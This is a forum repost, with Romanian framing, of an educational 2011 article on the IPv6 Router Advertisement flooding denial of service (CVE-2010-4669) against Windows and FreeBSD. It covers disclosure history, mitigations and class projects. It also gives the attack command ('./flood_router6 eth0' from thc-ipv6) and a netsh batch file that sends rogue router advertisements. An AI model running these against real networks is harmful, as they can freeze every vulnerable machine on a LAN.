Win 7 DoS by RA Packets

[me.mello]

Pregatiti-va ca aveti mult de citit + referinte dar aveti ce invata, IPv6 vulnerabil, o vulnerabilitate atat de mare incat un atacator poate opri toate pc-urile din retea, xBox PS3, FreeBds, Win8 cu doar o pagina web .html, o prezentare foarte bine descrisa de Sam Bowne, Have Fun.

Executive Summary

This is extremely dangerous! A single device can instantly stop all the Windows machines on a Local Area Network. In my tests, my Windows 7 virtual machine freezes totally and the only way to revive it is shutting the power off--an abnormal shutdown.

A student recorded this video, which makes it easier for people to quickly see the importance of the Windows IPv6 Router Advertisement vulnerability, without bothering with the technical details.

Imagine the effect of a single attacker on a small business, Internet coffeehouse, or any other LAN. This works on all Windows machines with IPv6 enabled, which includes Windows XP, Vista, Windows 7, Server 2008, and more. Mike Qaissaunee reported to me that it also stops X-Box and PS3 game consoles.

Suppose someone writes this into a malicious Web attack, so everyone who views a malicious Web page instantly kills all the machines on their LAN!

As far as I know, this attack will not traverse routers, so it "only" affects your local broadcast domain. But isn't that enough to deserve a security alert and a patch? Apparently not. Microsoft has told me and Mark Heuse* that they don't intend to patch this.

Responsible Disclosure

I regarded this as too dangerous to discuss on the Internet, and sent it to Microsoft privately. However, they informed me that this is not a new attack--it has been publicly known for months:

Excellent advisory from Marc Heuse* with complete disclosure timeline: http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt

Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability: Multiple Vendors IPv6 Neighbor Discovery Router Advertisement Remote Denial of Service Vulnerability

CVE-2010-4669 - Router Advertisements Cause DoS in Windows: National Vulnerability Database (NVD) National Vulnerability Database (CVE-2010-4669)

Mitigation

There is no patch from Microsoft. But there are three four ways I know of to protect your computers:

Disable IPv6. This is drastic, and will break services you may want, such as HomeGroups and DirectAccess. But it will protect you.

Turn off Router Discovery -- this is a simple solution, requiring only one command, but it will prevent you from using Stateless Autoconfiguration. It's probably appropriate for servers, but not as good for client machines. Details are shown below.

Use a firewall to block rogue Router Advertisements, while still allowing them from your authorized gateway. This is the most precise solution, but it is easily defeated. Details are shown below.

Get a switch with RA Guard -- details here: IPv6 Security Part 2, RA Guard – Let’s get practical - Insinuator

Added 5-30-2011:

Marc Heuse has demonstrated some techniques to evade RA Guard with packet fragmentation:

Bypassing Cisco's ICMPv6 Router Advertisement Guard feature: http://www.networksecurityarchive.org/html/FullDisclosure/2011-05/msg00446.html

Packet captures of RA Guard Evasion in action: Yet another update on IPv6 security – Some notes from the IPv6-Kongress in Frankfurt - Insinuator

Turning Off Router Discovery

I recommend turning off Router Discovery on all servers and any other machines that do not need "Stateless Autoconfiguration" (automatically configured IPv6 addresses), with this command (execute it from an Administrator Command Prompt):

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=disabled 

I found that solution here: IPv6: stateless autoconfiguration / manual configuration

Blocking Rogue Router Advertisements with Windows Firewall

This method allows you to use Stateless Autoconfiguration from your authorized gateways, but block dumb rogues. However, a smart rogue could just sniff your Router Advertisement packets and spoof the authorized source address, to bypass the firewall rule. So this is a weak defense.

To do this, open "Windows Firewall with Advanced Security" and double-click the "Core Networking - Router Advertisement (ICMPv6-In)" rule, as shown below on this page:

In the Properties sheet, on the Scope tab, in the "Remote IP address" section, the IP address starts at fe80::/64, which allows any host on the LAN to send Router Advertisements. Edit this to a more specific address which matches your authorized servers, as shown below on this page:

The Attack

cd /pentest/spoofing/thc-ipv6

./flood_router6 eth0 

Ctrl+C

Result

Any Win 7 machine on the same LAN is dead instantly, as all its resources are consumed joining thousands of fake IPv6 networks. To see the effect, cancel the attack very rapidly with Ctrl+C. Then with IPCONFIG you can see the effect on the target.

Batch File to Test for Vulnerability

On a Windows machine, run this batch file. Then run IFCONFIG on the other machines in your network. If they are vulnerable, they will show IPv6 addresses starting with dead:, as shown in the figure under the code.

ECHO TESTING YOUR NETWORK FOR IPv6 ROUTER ADVERTISEMENT VULNERABILITY

@ECHO OFF

netsh int ipv6 set addr "Local Area Connection" dead:1::1/64

netsh interface ipv6 set interface "Local Area Connection" routerdiscovery=enabled

netsh int ipv6 add route dead:407::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:407::/64 "Local Area Connection" 
ECHO SENDING ADVERTISEMENT #1 OF 3

netsh int ipv6 add route dead:408::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:408::/64 "Local Area Connection" 
ECHO SENDING ADVERTISEMENT #2 OF 3

netsh int ipv6 add route dead:409::/64 "Local Area Connection" siteprefixlength=64 publish=yes
ping 127.0.0.1 -n 3 -w 1000
netsh int ipv6 del route dead:409::/64 "Local Area Connection" 
ECHO SENDING ADVERTISEMENT #3 OF 3


ECHO RUN IPCONFIG ON EACH MACHINE AND LOOK FOR ADDRESSES STARTING dead::

The result on a vulnerable machine:

Class Projects

Here are some projects designed for use in schools and demonstrations:

Win 7 DoS by RA Packets : Project 8x: Win 7 DoS by RA Packets (20 pts.) --a slower, controllable version of the attack allows you to see just how many packets are required to stop a Windows machine.

Router Advertisements with scapy: Project 9x: Router Advertisements with scapy (20 pts.) -- with scapy, you can craft packets easily so you can try variations of the attack.

How to perform the attack from Windows using npg: Project 11x: Rogue RA Attack with npg on Windows (10 pts.)

FreeBSD is Vulnerable Too

At the Layer One security conference, on May 28, 2011, Justin Hohner tested a FreeBSD machine and told me it was vulnerable the same way. So we set up a VM and tried it there, with the results shown below (click for full-size image):

The full-speed flood_router6 attack froze the FreeBSD machine so it was almost impossible to use, just like a Windows machine.

So I slowed the attack down to approximately 100 RAs per second to capture this image:

100 RAs per second raised the CPU to 19.9% in my test.

I filed a bug report. kern/157410: [ip6] IPv6 Router Advertisements Cause Excessive CPU Use

We tested OpenBSD and it was not vulnerable: it just ignores all RAs after the first ten or so, the same way Ubuntu linux and Mac OS X do.

I just noticed that Marc Heuse already announced that BSD was vulnerable here http://www.mh-sec.de/downloads/mh-RA_flooding_CVE-2010-multiple.txt so that is not a new discovery. (5-30-2011)

Windows 8 Developer Preview is Vulnerable Too

This video was made by Josival Junior--good work!

Written by Sam Bowne; last modified 12 pm May 30, 2011

* On April 6 I mistakenly attributed Mark Heuse's advisory to Cisco. I fixed that error at 12:30 am April 7, 2011.

6-17-11: Fixed anchor tag error

9-15-2011: Added Win 8 Developer Preview video

Sper sa invatati ceva din asta si sa nu credeti ca IPv6 e mai sigur decat 4 si ca va revolutiona lumea, asa cum zice si articolul, companii gen Microsoft nu au de gand sa faca ceva in legatura cu asta, ba mai mult zic ca aceasta vulnerabilitate exista de luni bune.

Sursa: Win 7 DoS by RA Packets

Edited June 10, 2012 by me.mello